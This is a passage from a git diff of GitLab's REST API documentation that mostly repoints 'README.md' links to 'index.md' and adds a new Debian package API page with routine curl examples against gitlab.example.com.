project's merge_request. | ```shell @@ -2590,7 +2590,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/time_stats | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `merge_request_iid` | integer | yes | The internal ID of the merge request. | ```shell diff --git a/doc/api/merge_trains.md b/doc/api/merge_trains.md index f74f7785d30..2b52166d954 100644 --- a/doc/api/merge_trains.md +++ b/doc/api/merge_trains.md @@ -7,7 +7,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Merge Trains API **(PREMIUM)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/36146) in GitLab 12.9. -> - Using this API you can consume [Merge Train](../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md) entries. +> - Using this API you can consume [Merge Train](../ci/pipelines/merge_trains.md) entries. Every API call to merge trains must be authenticated with Developer or higher [permissions](../user/permissions.md). @@ -20,7 +20,7 @@ If Merge Trains is not available for the project, a `403` status code is returne By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ## List Merge Trains for a project @@ -33,7 +33,7 @@ GET /projects/:id/merge_trains?scope=complete | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | --------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `scope` | string | no | Return Merge Trains filtered by the given scope. Available scopes are `active` (to be merged) and `complete` (have been merged). | | `sort` | string | no | Return Merge Trains sorted in `asc` or `desc` order. Default is `desc`. | diff --git a/doc/api/metrics_user_starred_dashboards.md b/doc/api/metrics_user_starred_dashboards.md index 6f360cddd61..603d307f4b7 100644 --- a/doc/api/metrics_user_starred_dashboards.md +++ b/doc/api/metrics_user_starred_dashboards.md @@ -22,7 +22,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `dashboard_path` | string | yes | URL-encoded path to file defining the dashboard which should be marked as favorite. | ```shell @@ -53,7 +53,7 @@ Parameters: | Attribute | Type | Required | Description | |:---------------|:---------------|:---------|:-----------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `dashboard_path` | string | no | URL-encoded path to file defining the dashboard which should no longer be marked as favorite. When not supplied, all dashboards within given projects are removed from favorites. | ```shell diff --git a/doc/api/milestones.md b/doc/api/milestones.md index 15927ad852e..183d8b4799b 100644 --- a/doc/api/milestones.md +++ b/doc/api/milestones.md @@ -4,9 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Project milestones API +# Project milestones API **(FREE)** -This page describes the project milestones API. +Use project [milestones](../user/project/milestones/index.md) with the REST API. There's a separate [group milestones API](group_milestones.md) page. ## List project milestones @@ -27,7 +27,7 @@ Parameters: | Attribute | Type | Required | Description | | ---------------------------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `iids[]` | integer array | optional | Return only the milestones having the given `iid` (Note: ignored if `include_parent_milestones` is set as `true`) | | `state` | string | optional | Return only `active` or `closed` milestones | | `title` | string | optional | Return only the milestones having the given `title` | @@ -68,7 +68,7 @@ GET /projects/:id/milestones/:milestone_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of the project's milestone ## Create new milestone @@ -81,7 +81,7 @@ POST /projects/:id/milestones Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `title` (required) - The title of a milestone - `description` (optional) - The description of the milestone - `due_date` (optional) - The due date of the milestone @@ -97,7 +97,7 @@ PUT /projects/:id/milestones/:milestone_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of a project milestone - `title` (optional) - The title of a milestone - `description` (optional) - The description of a milestone @@ -107,7 +107,7 @@ Parameters: ## Delete project milestone -Only for users with Developer access to the project. +Only for users with the Developer role in the project. ```plaintext DELETE /projects/:id/milestones/:milestone_id @@ -115,7 +115,7 @@ DELETE /projects/:id/milestones/:milestone_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of the project's milestone ## Get all issues assigned to a single milestone @@ -128,7 +128,7 @@ GET /projects/:id/milestones/:milestone_id/issues Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of a project milestone ## Get all merge requests assigned to a single milestone @@ -141,14 +141,14 @@ GET /projects/:id/milestones/:milestone_id/merge_requests Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of a project milestone ## Promote project milestone to a group milestone > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53861) in GitLab 11.9 -Only for users with Developer access to the group. +Only for users with the Developer role in the group. ```plaintext POST /projects/:id/milestones/:milestone_id/promote @@ -156,7 +156,7 @@ POST /projects/:id/milestones/:milestone_id/promote Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of a project milestone ## Get all burndown chart events for a single milestone **(PREMIUM)** @@ -172,5 +172,5 @@ GET /projects/:id/milestones/:milestone_id/burndown_events Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `milestone_id` (required) - The ID of a project milestone diff --git a/doc/api/namespaces.md b/doc/api/namespaces.md index 50b28e67c0a..ac8ea95ef30 100644 --- a/doc/api/namespaces.md +++ b/doc/api/namespaces.md @@ -11,7 +11,7 @@ Usernames and group names fall under a special category called namespaces. For users and groups supported API calls see the [users](users.md) and [groups](groups.md) documentation respectively. -[Pagination](README.md#pagination) is used. +[Pagination](index.md#pagination) is used. ## List namespaces @@ -79,15 +79,14 @@ Example response: ] ``` -Users on GitLab.com [Bronze or higher](https://about.gitlab.com/pricing/#gitlab-com) may also see -the `plan` parameter associated with a namespace: +Owners also see the `plan` property associated with a namespace: ```json [ { "id": 1, "name": "user1", - "plan": "bronze", + "plan": "silver", ... } ] @@ -114,7 +113,7 @@ once a day. ``` NOTE: -Only group maintainers/owners are presented with `members_count_with_descendants`, as well as `plan` **(BRONZE ONLY)**. +Only group owners are presented with `members_count_with_descendants` and `plan`. ## Search for namespace @@ -168,7 +167,7 @@ GET /namespaces/:id | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the namespace](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | ID or [URL-encoded path of the namespace](index.md#namespaced-path-encoding) | Example request: diff --git a/doc/api/notes.md b/doc/api/notes.md index 0fb13e56f78..6a3db0a2aab 100644 --- a/doc/api/notes.md +++ b/doc/api/notes.md @@ -34,7 +34,7 @@ Some system notes are not part of this API, but are recorded as separate events: By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ## Rate limits @@ -54,7 +54,7 @@ GET /projects/:id/issues/:issue_iid/notes?sort=asc&order_by=updated_at | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | `issue_iid` | integer | yes | The IID of an issue | `sort` | string | no | Return issue notes sorted in `asc` or `desc` order. Default is `desc` | `order_by` | string | no | Return issue notes ordered by `created_at` or `updated_at` fields. Default is `created_at` @@ -120,7 +120,7 @@ GET /projects/:id/issues/:issue_iid/notes/:note_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `issue_iid` (required) - The IID of a project issue - `note_id` (required) - The ID of an issue note @@ -138,7 +138,7 @@ POST /projects/:id/issues/:issue_iid/notes Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `issue_iid` (required) - The IID of an issue - `body` (required) - The content of a note. Limited to 1,000,000 characters. - `confidential` (optional) - The confidential flag of a note. Default is false. @@ -158,7 +158,7 @@ PUT /projects/:id/issues/:issue_iid/notes/:note_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). - `issue_iid` (required) - The IID of an issue. - `note_id` (required) - The ID of a note. - `body` (optional) - The content of a note. Limited to 1,000,000 characters. @@ -180,7 +180,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `issue_iid` | integer | yes | The IID of an issue | | `note_id` | integer | yes | The ID of a note | @@ -203,7 +203,7 @@ GET /projects/:id/snippets/:snippet_id/notes?sort=asc&order_by=updated_at | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | `snippet_id` | integer | yes | The ID of a project snippet | `sort` | string | no | Return snippet notes sorted in `asc` or `desc` order. Default is `desc` | `order_by` | string | no | Return snippet notes ordered by `created_at` or `updated_at` fields. Default is `created_at` @@ -222,7 +222,7 @@ GET /projects/:id/snippets/:snippet_id/notes/:note_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `snippet_id` (required) - The ID of a project snippet - `note_id` (required) - The ID of a snippet note @@ -260,7 +260,7 @@ POST /projects/:id/snippets/:snippet_id/notes Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `snippet_id` (required) - The ID of a snippet - `body` (required) - The content of a note. Limited to 1,000,000 characters. - `created_at` (optional) - Date time string, ISO 8601 formatted. Example: `2016-03-11T03:45:40Z` (requires administrator or project/group owner rights) @@ -279,7 +279,7 @@ PUT /projects/:id/snippets/:snippet_id/notes/:note_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `snippet_id` (required) - The ID of a snippet - `note_id` (required) - The ID of a note - `body` (required) - The content of a note. Limited to 1,000,000 characters. @@ -300,7 +300,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of a snippet | | `note_id` | integer | yes | The ID of a note | @@ -321,7 +321,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/notes?sort=asc&order_by=upda | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | `merge_request_iid` | integer | yes | The IID of a project merge request | `sort` | string | no | Return merge request notes sorted in `asc` or `desc` order. Default is `desc` | `order_by` | string | no | Return merge request notes ordered by `created_at` or `updated_at` fields. Default is `created_at` @@ -340,7 +340,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/notes/:note_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `merge_request_iid` (required) - The IID of a project merge request - `note_id` (required) - The ID of a merge request note @@ -383,7 +383,7 @@ POST /projects/:id/merge_requests/:merge_request_iid/notes Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `merge_request_iid` (required) - The IID of a merge request - `body` (required) - The content of a note. Limited to 1,000,000 characters. - `created_at` (optional) - Date time string, ISO 8601 formatted. Example: `2016-03-11T03:45:40Z` (requires administrator or project/group owner rights) @@ -398,7 +398,7 @@ PUT /projects/:id/merge_requests/:merge_request_iid/notes/:note_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) - `merge_request_iid` (required) - The IID of a merge request - `note_id` (required) - The ID of a note - `body` (required) - The content of a note. Limited to 1,000,000 characters. @@ -419,7 +419,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `note_id` | integer | yes | The ID of a note | @@ -440,7 +440,7 @@ GET /groups/:id/epics/:epic_id/notes?sort=asc&order_by=updated_at | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of a group epic | | `sort` | string | no | Return epic notes sorted in `asc` or `desc` order. Default is `desc` | | `order_by` | string | no | Return epic notes ordered by `created_at` or `updated_at` fields. Default is `created_at` | @@ -461,7 +461,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `note_id` | integer | yes | The ID of a note | @@ -502,7 +502,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `body` | string | yes | The content of a note. Limited to 1,000,000 characters. | @@ -522,7 +522,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `note_id` | integer | yes | The ID of a note | | `body` | string | yes | The content of a note. Limited to 1,000,000 characters. | @@ -543,7 +543,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `note_id` | integer | yes | The ID of a note | diff --git a/doc/api/notification_settings.md b/doc/api/notification_settings.md index 69bed193f07..390ba7dbd79 100644 --- a/doc/api/notification_settings.md +++ b/doc/api/notification_settings.md @@ -4,22 +4,20 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Notification settings API +# Notification settings API **(FREE)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/5632) in GitLab 8.12. +Change [notification settings](../user/profile/notifications.md) using the REST API. ## Valid notification levels The notification levels are defined in the `NotificationSetting.level` model enumeration. Currently, these levels are recognized: -```plaintext -disabled -participating -watch -global -mention -custom -``` +- `disabled` +- `participating` +- `watch` +- `global` +- `mention` +- `custom` If the `custom` level is used, specific email events can be controlled. Available events are returned by `NotificationSetting.email_events`. Currently, these events are recognized: @@ -123,7 +121,7 @@ curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/a | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer or string | yes | The ID, or [URL-encoded path, of the group or project](README.md#namespaced-path-encoding). | +| `id` | integer or string | yes | The ID, or [URL-encoded path, of the group or project](index.md#namespaced-path-encoding). | Example response: @@ -149,7 +147,7 @@ curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer or string | yes | The ID, or [URL-encoded path, of the group or project](README.md#namespaced-path-encoding) | +| `id` | integer or string | yes | The ID, or [URL-encoded path, of the group or project](index.md#namespaced-path-encoding) | | `level` | string | no | The global notification level | | `new_note` | boolean | no | Enable/disable this notification | | `new_issue` | boolean | no | Enable/disable this notification | diff --git a/doc/api/oauth2.md b/doc/api/oauth2.md index f5c75aac0d9..1b06e554e5e 100644 --- a/doc/api/oauth2.md +++ b/doc/api/oauth2.md @@ -218,7 +218,7 @@ https://gitlab.example.com/oauth/authorize?client_id=APP_ID&redirect_uri=REDIREC This prompts the user to approve the applications access to their account based on the scopes specified in `REQUESTED_SCOPES` and then redirect back to the `REDIRECT_URI` you provided. The [scope parameter](https://github.com/doorkeeper-gem/doorkeeper/wiki/Using-Scopes#requesting-particular-scopes) - is a space separated list of scopes you want to have access to (e.g. `scope=read_user+profile` + is a space separated list of scopes you want to have access to (for example, `scope=read_user+profile` would request `read_user` and `profile` scopes). The redirect includes a fragment with `access_token` as well as token details in GET parameters, for example: diff --git a/doc/api/openapi/openapi.yaml b/doc/api/openapi/openapi.yaml index 46267129b32..cc6a161c783 100644 --- a/doc/api/openapi/openapi.yaml +++ b/doc/api/openapi/openapi.yaml @@ -15,7 +15,7 @@ info: When viewing this on gitlab.com, you can test API calls directly from the browser against the `gitlab.com` instance, if you are logged in. - The feature uses the current [GitLab session cookie](https://docs.gitlab.com/ee/api/README.html#session-cookie), + The feature uses the current [GitLab session cookie](https://docs.gitlab.com/ee/api/index.html#session-cookie), so each request is made using your account. Instructions for using this tool can be found in [Interactive API Documentation](openapi_interactive.md). diff --git a/doc/api/openapi/openapi_interactive.md b/doc/api/openapi/openapi_interactive.md index 05fd7b20b75..c9434147609 100644 --- a/doc/api/openapi/openapi_interactive.md +++ b/doc/api/openapi/openapi_interactive.md @@ -14,7 +14,7 @@ The [OpenAPI specification](https://swagger.io/specification/) (formerly called standard, language-agnostic interface to RESTful APIs. OpenAPI definition files are written in the YAML format, which is automatically rendered by the GitLab browser into a more human-readable interface. -For general information about the GitLab APIs, see [API Docs](../README.md). +For general information about the GitLab APIs, see [API Docs](../index.md). ## Overview diff --git a/doc/api/packages.md b/doc/api/packages.md index c257105f72e..73092e68c82 100644 --- a/doc/api/packages.md +++ b/doc/api/packages.md @@ -23,10 +23,10 @@ GET /projects/:id/packages | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `order_by`| string | no | The field to use as order. One of `created_at` (default), `name`, `version`, or `type`. | | `sort` | string | no | The direction of the order, either `asc` (default) for ascending order or `desc` for descending order. | -| `package_type` | string | no | Filter the returned packages by type. One of `conan`, `maven`, `npm`, `pypi`, `composer`, `nuget`, or `golang`. (_Introduced in GitLab 12.9_) +| `package_type` | string | no | Filter the returned packages by type. One of `conan`, `maven`, `npm`, `pypi`, `composer`, `nuget`, `helm`, or `golang`. (_Introduced in GitLab 12.9_) | `package_name` | string | no | Filter the project packages with a fuzzy search by name. (_Introduced in GitLab 12.9_) | `include_versionless` | boolean | no | When set to true, versionless packages are included in the response. (_Introduced in GitLab 13.8_) | `status` | string | no | Filter the returned packages by status. One of `default` (default), `hidden`, or `processing`. (_Introduced in GitLab 13.9_) @@ -69,7 +69,7 @@ Example response: ] ``` -By default, the `GET` request returns 20 results, because the API is [paginated](README.md#pagination). +By default, the `GET` request returns 20 results, because the API is [paginated](index.md#pagination). Although you can filter packages by status, working with packages that have a `processing` status can result in malformed data or broken packages. @@ -87,11 +87,11 @@ GET /groups/:id/packages | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the group](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the group](index.md#namespaced-path-encoding). | | `exclude_subgroups` | boolean | false | If the parameter is included as true, packages from projects from subgroups are not listed. Default is `false`. | | `order_by`| string | no | The field to use as order. One of `created_at` (default), `name`, `version`, `type`, or `project_path`. | | `sort` | string | no | The direction of the order, either `asc` (default) for ascending order or `desc` for descending order. | -| `package_type` | string | no | Filter the returned packages by type. One of `conan`, `maven`, `npm`, `pypi`, `composer`, `nuget`, or `golang`. (_Introduced in GitLab 12.9_) | +| `package_type` | string | no | Filter the returned packages by type. One of `conan`, `maven`, `npm`, `pypi`, `composer`, `nuget`, `helm`, or `golang`. (_Introduced in GitLab 12.9_) | | `package_name` | string | no | Filter the project packages with a fuzzy search by name. (_[Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/30980) in GitLab 13.0_) | `include_versionless` | boolean | no | When set to true, versionless packages are included in the response. (_Introduced in GitLab 13.8_) | `status` | string | no | Filter the returned packages by status. One of `default` (default), `hidden`, or `processing`. (_Introduced in GitLab 13.9_) @@ -164,7 +164,7 @@ Example response: ] ``` -By default, the `GET` request returns 20 results, because the API is [paginated](README.md#pagination). +By default, the `GET` request returns 20 results, because the API is [paginated](index.md#pagination). The `_links` object contains the following properties: @@ -186,7 +186,7 @@ GET /projects/:id/packages/:package_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `package_id` | integer | yes | ID of a package. | ```shell @@ -268,7 +268,7 @@ GET /projects/:id/packages/:package_id/package_files | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `package_id` | integer | yes | ID of a package. | ```shell @@ -327,7 +327,7 @@ Example response: ] ``` -By default, the `GET` request returns 20 results, because the API is [paginated](README.md#pagination). +By default, the `GET` request returns 20 results, because the API is [paginated](index.md#pagination). ## Delete a project package @@ -341,7 +341,7 @@ DELETE /projects/:id/packages/:package_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `package_id` | integer | yes | ID of a package. | ```shell @@ -369,7 +369,7 @@ DELETE /projects/:id/packages/:package_id/package_files/:package_file_id | Attribute | Type | Required | Description | | ----------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `package_id` | integer | yes | ID of a package. | | `package_file_id` | integer | yes | ID of a package file. | diff --git a/doc/api/packages/debian.md b/doc/api/packages/debian.md new file mode 100644 index 00000000000..cd97bd609df --- /dev/null +++ b/doc/api/packages/debian.md @@ -0,0 +1,151 @@ +--- +stage: Package +group: Package +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Debian API + +This is the API documentation for [Debian](../../user/packages/debian_repository/index.md). + +WARNING: +This API is used by the Debian related package clients such as [dput](https://manpages.debian.org/stable/dput-ng/dput.1.en.html) +and [apt-get](https://manpages.debian.org/stable/apt/apt-get.8.en.html), +and is generally not meant for manual consumption. This API is under development and is not ready +for production use due to limited functionality. + +For instructions on how to upload and install Debian packages from the GitLab +package registry, see the [Debian registry documentation](../../user/packages/debian_repository/index.md). + +NOTE: +These endpoints do not adhere to the standard API authentication methods. +See the [Debian registry documentation](../../user/packages/debian_repository/index.md) +for details on which headers and token types are supported. + +## Enable the Debian API + +The Debian API for GitLab is behind a feature flag that is disabled by default. GitLab +administrators with access to the GitLab Rails console can enable this API for your instance. + +To enable it: + +```ruby +Feature.enable(:debian_packages) +``` + +To disable it: + +```ruby +Feature.disable(:debian_packages) +``` + +## Upload a package file + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/62028) in GitLab 14.0. + +Upload a Debian package file: + +```plaintext +PUT projects/:id/packages/debian/:file_name +``` + +| Attribute | Type | Required | Description | +| --------- | ---- | -------- | ----------- | +| `id` | string | yes | The ID or full path of the project. | +| `file_name` | string | yes | The name of the Debian package file. | + +```shell +curl --request PUT \ + --upload-file path/to/mypkg.deb \ + --header "Private-Token: <personal_access_token>" \ + "https://gitlab.example.com/api/v4/projects/1/packages/debian/mypkg.deb" +``` + +## Route prefix + +The remaining endpoints described are two sets of identical routes that each make requests in +different scopes: + +- Use the project-level prefix to make requests in a single project's scope. +- Use the group-level prefix to make requests in a single group's scope. + +The examples in this document all use the project-level prefix. + +### Project-level + +```plaintext + /projects/:id/packages/debian` +``` + +| Attribute | Type | Required | Description | +| --------- | ---- | -------- | ----------- | +| `id` | string | yes | The project ID or full project path. | + +### Group-level + +```plaintext + /groups/:id/-/packages/debian` +``` + +| Attribute | Type | Required | Description | +| --------- | ---- | -------- | ----------- | +| `id` | string | yes | The project ID or full group path. | + +## Download a distribution Release file + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64067) in GitLab 14.1. + +Download a Debian package file. + +```plaintext +GET <route-prefix>/dists/*distribution/Release +``` + +| Attribute | Type | Required | Description | +| ----------------- | ------ | -------- | ----------- | +| `distribution` | string | yes | The codename or suite of the Debian distribution. | + +```shell +curl --header "Private-Token: <personal_access_token>" "https://gitlab.example.com/api/v4/projects/1/packages/debian/dists/my-distro/Release" +``` + +Write the output to a file: + +```shell +curl --header "Private-Token: <personal_access_token>" \ + "https://gitlab.example.com/api/v4/projects/1/packages/debian/dists/my-distro/Release" \ + --remote-name +``` + +This writes the downloaded file to `Release` in the current directory. + +## Download a signed distribution Release file + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64067) in GitLab 14.1. + +Download a Debian package file. + +Signed releases are [not supported](https://gitlab.com/groups/gitlab-org/-/epics/6057#note_582697034). +Therefore, this endpoint downloads the unsigned release file. + +```plaintext +GET <route-prefix>/dists/*distribution/InRelease +``` + +| Attribute | Type | Required | Description | +| ----------------- | ------ | -------- | ----------- | +| `distribution` | string | yes | The codename or suite of the Debian distribution. | + +```shell +curl --header "Private-Token: <personal_access_token>" "https://gitlab.example.com/api/v4/projects/1/packages/debian/dists/my-distro/InRelease" +``` + +Write the output to a file: + +```shell +curl --header "Private-Token: <personal_access_token>" \ + "https://gitlab.example.com/api/v4/projects/1/packages/debian/dists/my-distro/InRelease" \ + --remote-name +``` + +This writes the downloaded file to `InRelease` in the current directory. diff --git a/doc/api/packages/debian_group_distributions.md b/doc/api/packages/debian_group_distributions.md new file mode 100644 index 00000000000..ba61bf49e01 --- /dev/null +++ 